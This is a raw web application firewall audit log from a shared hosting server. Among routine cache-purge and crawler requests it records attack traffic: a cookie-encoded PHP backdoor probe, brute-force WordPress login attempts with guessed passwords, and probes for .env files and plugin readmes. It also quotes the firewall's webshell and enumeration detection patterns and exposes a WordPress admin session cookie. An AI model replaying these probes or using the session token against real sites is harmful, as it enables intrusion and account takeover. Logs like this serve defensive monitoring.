aGOEC5iCtxhaXYEaGXYHrQAAADs 103.185.74.40 12512 192.168.74.40 443 --fcb8276a-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --fcb8276a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fcb8276a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352331540090 1332260 (- - -) Stopwatch2: 1751352331540090 1332260; combined=3333, p1=122, p2=3047, p3=0, p4=0, p5=164, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --fcb8276a-Z-- --41dc6137-A-- [01/Jul/2025:12:15:35.113250 +0530] aGOEDZTiKJgq7f-9wr-FtwAAAAE 51.44.203.200 59479 192.168.74.40 443 --41dc6137-B-- GET /inputs.php HTTP/1.1 Host: hllacademy.in Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Cookie: 67=base64_;80=decode;20=ZWNobyAidGVzdCI7;29=ZWNobyAnWGRheSc7;1=a;3=a;2=a;5=a;4=a;7=a;6=a;9=a;500=a;38=b;90=dGVzdA==;11=a;10=a;13=a;12=a;15=a;14=a;17=a;16=a;19=array25;18=a; Cache-Control: no-cache Upgrade-Insecure-Requests: 1 --41dc6137-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352658213476 16331 (- - -) Stopwatch2: 1751352658213476 16331; combined=4550, p1=129, p2=4242, p3=0, p4=0, p5=179, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3febdc25-Z-- --d83e5c29-A-- [01/Jul/2025:12:20:59.203005 +0530] aGOFUjB0N73AXFOPA_eMGQAAABs 103.185.74.40 2523 192.168.74.40 443 --d83e5c29-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --d83e5c29-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d83e5c29-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352658131882 1071882 (- - -) Stopwatch2: 1751352658131882 1071882; combined=3003, p1=96, p2=2706, p3=0, p4=0, p5=200, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d83e5c29-Z-- --8abb3912-A-- [01/Jul/2025:12:20:59.396732 +0530] aGOFU1C73oIHsUMnOoc8WQAAACI 57.141.0.1 52894 192.168.74.40 443 --8abb3912-B-- GET /rajasthan-tours-from-ahmedabad/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/rajasthan-tours-from-agra/images/Rajasthan-Travel-Guides/hotels-jodhpur.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --8abb3912-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352660330088 14977 (- - -) Stopwatch2: 1751352660330088 14977; combined=2703, p1=155, p2=2414, p3=0, p4=0, p5=134, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b8acd051-Z-- --5efb2f6e-A-- [01/Jul/2025:12:21:00.506199 +0530] aGOFU6DJfRrh2yW952-b4QAAADQ 103.185.74.40 45885 192.168.74.40 443 --5efb2f6e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --5efb2f6e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5efb2f6e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352659412526 1094337 (- - -) Stopwatch2: 1751352659412526 1094337; combined=2787, p1=77, p2=2555, p3=0, p4=0, p5=155, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5efb2f6e-Z-- --33f01e5a-A-- [01/Jul/2025:12:21:01.496500 +0530] aGOFVQ-2HPEVQrMmOV98GwAAACU 20.171.207.232 44014 192.168.74.40 443 --33f01e5a-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/Rajasthan-Travel-Guides/images/aainag/tempo-traveller-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --33f01e5a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352665033770 16825 (- - -) Stopwatch2: 1751352665033770 16825; combined=3694, p1=177, p2=3344, p3=0, p4=0, p5=173, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7b02415e-Z-- --08e02f0e-A-- [01/Jul/2025:12:21:06.119956 +0530] aGOFWakXKBMy4LCH1A42bwAAADU 103.185.74.40 20658 192.168.74.40 443 --08e02f0e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --08e02f0e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --08e02f0e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352665054774 1065781 (- - -) Stopwatch2: 1751352665054774 1065781; combined=2512, p1=94, p2=2278, p3=0, p4=0, p5=140, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --08e02f0e-Z-- --8bc74f5a-A-- [01/Jul/2025:12:21:06.240600 +0530] aGOFWg-2HPEVQrMmOV98HwAAACU 20.171.207.232 44014 192.168.74.40 443 --8bc74f5a-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/https/Rajasthan-Travel-Guides/aainag/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8bc74f5a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352667363304 16142 (- - -) Stopwatch2: 1751352667363304 16142; combined=3296, p1=219, p2=2949, p3=0, p4=0, p5=128, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --01ba8459-Z-- --4c1ad713-A-- [01/Jul/2025:12:21:07.456651 +0530] aGOFWpfceUhBnfXSqMypWAAAACM 103.185.74.40 25012 192.168.74.40 443 --4c1ad713-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4c1ad713-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4c1ad713-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352666335904 1121249 (- - -) Stopwatch2: 1751352666335904 1121249; combined=2749, p1=105, p2=2428, p3=0, p4=0, p5=215, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4c1ad713-Z-- --81e7270a-A-- [01/Jul/2025:12:21:08.493453 +0530] aGOFXA-2HPEVQrMmOV98IQAAACU 20.171.207.232 44014 192.168.74.40 443 --81e7270a-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/js/Rajasthan-Travel-Guides/aainag/tempo-traveller-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --81e7270a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355934370982 1146443 (- - -) Stopwatch2: 1751355934370982 1146443; combined=8316, p1=132, p2=7352, p3=393, p4=22, p5=417, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3d9a3b26-Z-- --33c22564-A-- [01/Jul/2025:13:15:35.859902 +0530] aGOSHhWBv2AsJnceVSBzeAAAAB4 103.185.74.40 36919 192.168.74.40 443 --33c22564-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --33c22564-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --33c22564-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355934698091 1162374 (- - -) Stopwatch2: 1751355934698091 1162374; combined=2570, p1=80, p2=2275, p3=0, p4=0, p5=214, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --33c22564-Z-- --2cd61a67-A-- [01/Jul/2025:13:15:37.005263 +0530] aGOSH4UrLvpnN577nbUtoAAAAEs 199.101.196.88 59933 192.168.74.40 443 --2cd61a67-B-- POST //wp-login.php HTTP/1.1 Host: kenyuryukarateindia.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check; cl-bypass-cache=yes User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 91 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://kenyuryukarateindia.com//wp-login.php --2cd61a67-C-- log=kenyu&pwd=#user#@01&redirect_to=https://kenyuryukarateindia.com//wp-admin/&testcookie=1 --2cd61a67-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355935821246 1184662 (- - -) Stopwatch2: 1751355935821246 1184662; combined=7167, p1=165, p2=6171, p3=356, p4=20, p5=454, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2cd61a67-Z-- --295e173a-A-- [01/Jul/2025:13:15:37.319968 +0530] aGOSIDWGstM5WbqzxyhabwAAACw 103.185.74.40 22694 192.168.74.40 443 --295e173a-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --295e173a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --295e173a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355936072266 1248225 (- - -) Stopwatch2: 1751355936072266 1248225; combined=2621, p1=111, p2=2356, p3=0, p4=0, p5=153, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --295e173a-Z-- --81153d65-A-- [01/Jul/2025:13:15:38.494737 +0530] aGOSIYUrLvpnN577nbUtoQAAAEs 199.101.196.88 59933 192.168.74.40 443 --81153d65-B-- POST //wp-login.php HTTP/1.1 Host: kenyuryukarateindia.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check; cl-bypass-cache=yes User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 93 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://kenyuryukarateindia.com//wp-login.php --81153d65-C-- log=kenyu&pwd=#user#@0123&redirect_to=https://kenyuryukarateindia.com//wp-admin/&testcookie=1 --81153d65-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751357427935920 1715693 (- - -) Stopwatch2: 1751357427935920 1715693; combined=9074, p1=182, p2=7901, p3=425, p4=32, p5=533, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bc6cb944-Z-- --c81caa5d-A-- [01/Jul/2025:13:40:29.908936 +0530] aGOX9UY8uSEEYPJxzFJtYwAAACI 103.185.74.40 19431 192.168.74.40 443 --c81caa5d-B-- POST /2024/relite/wp-admin/admin-ajax.php?action=elementor_1_elementor_updater&nonce=f7fabb23aa HTTP/1.1 Host: wpcodex.xyz User-Agent: WordPress/6.8.1; https://wpcodex.xyz/2024/relite Accept: */* Accept-Encoding: deflate, gzip Cookie: wordpress_sec_960ef4ad69df7c4138c6955def0d03e6=admin|1752472688|NouczWVVe15makFTa5YMSDr3bMIYKTagoH8CpNdJKxY|ddbc6dca02f0339f92c76c5a6809fd22c31fc37c91a02de5abbf8ec2ec4b8361; wordpress_test_cookie=WP Cookie check; wordpress_logged_in_960ef4ad69df7c4138c6955def0d03e6=admin|1752472688|NouczWVVe15makFTa5YMSDr3bMIYKTagoH8CpNdJKxY|0f7f46ddee8a47a3a56bbf58729cd71aa66f0dad49f447e08c2b04e52568c497; wp_lang=en_US; wp-settings-1=libraryContent=browse&editor=tinymce; wp-settings-time-1=1751351709 Connection: close Content-Length: 194 Content-Type: application/x-www-form-urlencoded --c81caa5d-C-- 0%5Bcallback%5D%5B0%5D=Elementor%5CCore%5CUpgrade%5CUpgrades&0%5Bcallback%5D%5B1%5D=_on_each_version&1%5Bcallback%5D%5B0%5D=Elementor%5CCore%5CUpgrade%5CUpgrades&1%5Bcallback%5D%5B1%5D=_v_3_26_0 --c81caa5d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin X-Frame-Options: SAMEORIGIN Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c81caa5d-H-- Message: Pattern match "(?:edit-theme-plugin-file|update|activate|(?:upload|install-(?:plugin|theme)))" at ARGS:action. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/004_i360_vectors.conf"] [line "41"] [id "77316925"] [msg "IM360 WAF: WordPress theme/plugin activity track||File:||SC:/home/brainsto/public_html/2024/relite/wp-admin/admin-ajax.php||Action:||Theme:||Plugin:||User:brainsto||WPU:admin||RSV:7.05||RS:0||T:APACHE||"] [severity "DEBUG"] [tag "wp_core"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751357429116710 792977 (- - -) Stopwatch2: 1751357429116710 792977; combined=12674, p1=255, p2=11621, p3=352, p4=7, p5=439, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c81caa5d-Z-- --e255237e-A-- [01/Jul/2025:13:40:32.277926 +0530] aGOX9Zpr2la02YxMBRp-YgAAABs 173.239.211.177 28767 192.168.74.40 443 --e255237e-B-- POST //wp-login.php HTTP/1.1 Host: kenyuryukarateindia.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check; cl-bypass-cache=yes User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 90 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --deb5e86c-Z-- --23b5df5e-A-- [01/Jul/2025:14:04:53.936323 +0530] aGOdraUwjZ1tF9Kajvj-EwAAADo 143.198.202.179 62382 192.168.74.40 80 --23b5df5e-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --23b5df5e-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --23b5df5e-H-- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1820"] [id "77350190"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "readme.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1827"] [id "77350589"] [msg "IM360 WAF: WordPress plugins/themes version enumeration using readme.txt||MV:/wp-content/plugins/litespeed-cache/readme.txt||User:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "/wp-content/plugins/litespeed-cache/readme.txt" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "2221"] [id "77350639"] [msg "IM360 WAF: Suspicious access attempt to WordPress debug.log (CVE-2024-44000)||MV:/wp-content/plugins/litespeed-cache/readme.txt||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] Apache-Handler: default-handler Stopwatch: 1751358893929056 7364 (- - -) Stopwatch2: 1751358893929056 7364; combined=4034, p1=99, p2=3817, p3=0, p4=0, p5=118, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --23b5df5e-Z-- --e96c0f17-A-- [01/Jul/2025:14:04:53.987876 +0530] aGOdrZSn3bRNgiObRJqlLwAAACI 20.171.207.232 52184 192.168.74.40 443 --e96c0f17-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/images/aainag/Rajasthan-Travel-Guides/Map-of-Rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e96c0f17-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e96c0f17-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/images/aainag/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/images/aainag/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d062a66d-Z-- --cdae3260-A-- [01/Jul/2025:14:10:12.232803 +0530] aGOe6wcsiZB0cO2JNq0LlgAAAA8 162.243.75.54 58326 192.168.74.40 443 --cdae3260-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --cdae3260-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --cdae3260-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359211682303 550939 (- - -) Stopwatch2: 1751359211682303 550939; combined=945, p1=95, p2=638, p3=0, p4=0, p5=212, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cdae3260-Z-- --9c0bad2c-A-- [01/Jul/2025:14:10:13.359611 +0530] 